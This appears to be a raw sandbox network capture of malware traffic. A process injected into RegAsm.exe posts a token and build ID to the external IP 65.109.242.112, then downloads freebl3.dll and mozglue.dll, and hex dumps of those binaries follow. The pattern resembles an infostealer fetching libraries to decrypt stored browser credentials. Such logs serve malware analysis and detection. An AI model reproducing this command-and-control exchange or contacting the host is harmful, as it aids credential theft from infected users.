                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:47:11 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-05-12 10:47:11 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                10192.168.2.44974165.109.242.1124432832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-05-12 10:47:11 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----FCAAAAFBKFIECAAKECGC
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Content-Length: 437
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-05-12 10:47:11 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 33 34 63 65 31 39 31 64 39 30 37 35 39 33 32 39 36 65 65 38 38 62 36 37 39 33 61 37 65 35 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 38 31 61 32 32 33 62 65 63 31 38 30 65 62 66 64 63 34 38 35 34 37 64 33 64 35 62 64 37 38 34 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------FCAAAAFBKFIECAAKECGCContent-Disposition: form-data; name="token"b234ce191d907593296ee88b6793a7e5------FCAAAAFBKFIECAAKECGCContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------FCAAAAFBKFIECAAKECGCCont
                                                                                                                                                                                                                                                                2024-05-12 10:47:12 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:47:12 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-05-12 10:47:12 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                11192.168.2.44974565.109.242.1124432832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-05-12 10:47:12 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----BGDAAKJJDAAKFHJKJKFC
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Content-Length: 437
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-05-12 10:47:12 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 33 34 63 65 31 39 31 64 39 30 37 35 39 33 32 39 36 65 65 38 38 62 36 37 39 33 61 37 65 35 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 38 31 61 32 32 33 62 65 63 31 38 30 65 62 66 64 63 34 38 35 34 37 64 33 64 35 62 64 37 38 34 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="token"b234ce191d907593296ee88b6793a7e5------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------BGDAAKJJDAAKFHJKJKFCCont
                                                                                                                                                                                                                                                                2024-05-12 10:47:14 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:47:13 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-05-12 10:47:14 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                12192.168.2.44974765.109.242.1124432832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-05-12 10:47:13 UTC221OUTGET /freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-05-12 10:47:14 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:47:14 GMT
                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                Content-Length: 685392
                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                ETag: "6315a9f4-a7550"
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                2024-05-12 10:47:14 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                                                                                                                                                                                                2024-05-12 10:47:15 UTC16384INData Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b
                                                                                                                                                                                                                                                                Data Ascii: }1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x]E0
                                                                                                                                                                                                                                                                2024-05-12 10:47:15 UTC16384INData Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90
                                                                                                                                                                                                                                                                Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
                                                                                                                                                                                                                                                                2024-05-12 10:47:15 UTC16384INData Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d
                                                                                                                                                                                                                                                                Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
                                                                                                                                                                                                                                                                2024-05-12 10:47:15 UTC16384INData Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f
                                                                                                                                                                                                                                                                Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
                                                                                                                                                                                                                                                                2024-05-12 10:47:15 UTC16384INData Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0
                                                                                                                                                                                                                                                                Data Ascii: }EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w w1
                                                                                                                                                                                                                                                                2024-05-12 10:47:15 UTC16384INData Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff
                                                                                                                                                                                                                                                                Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE|l
                                                                                                                                                                                                                                                                2024-05-12 10:47:15 UTC16384INData Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff
                                                                                                                                                                                                                                                                Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
                                                                                                                                                                                                                                                                2024-05-12 10:47:15 UTC16384INData Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c
                                                                                                                                                                                                                                                                Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
                                                                                                                                                                                                                                                                2024-05-12 10:47:15 UTC16384INData Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff
                                                                                                                                                                                                                                                                Data Ascii: 0<48%8A)$(


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                13192.168.2.44974965.109.242.1124432832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-05-12 10:47:17 UTC221OUTGET /mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-05-12 10:47:18 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:47:17 GMT
                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                Content-Length: 608080
                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                ETag: "6315a9f4-94750"
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                2024-05-12 10:47:18 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                                                                                                                                                                                                2024-05-12 10:47:18 UTC16384INData Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46
                                                                                                                                                                                                                                                                Data Ascii: A$P~#HbA$P~#HUVuF|FlNhFdFhFTNPFLFPF
                                                                                                                                                                                                                                                                2024-05-12 10:47:18 UTC16384INData Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1
                                                                                                                                                                                                                                                                Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
                                                                                                                                                                                                                                                                2024-05-12 10:47:18 UTC16384INData Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba
                                                                                                                                                                                                                                                                Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}LQ
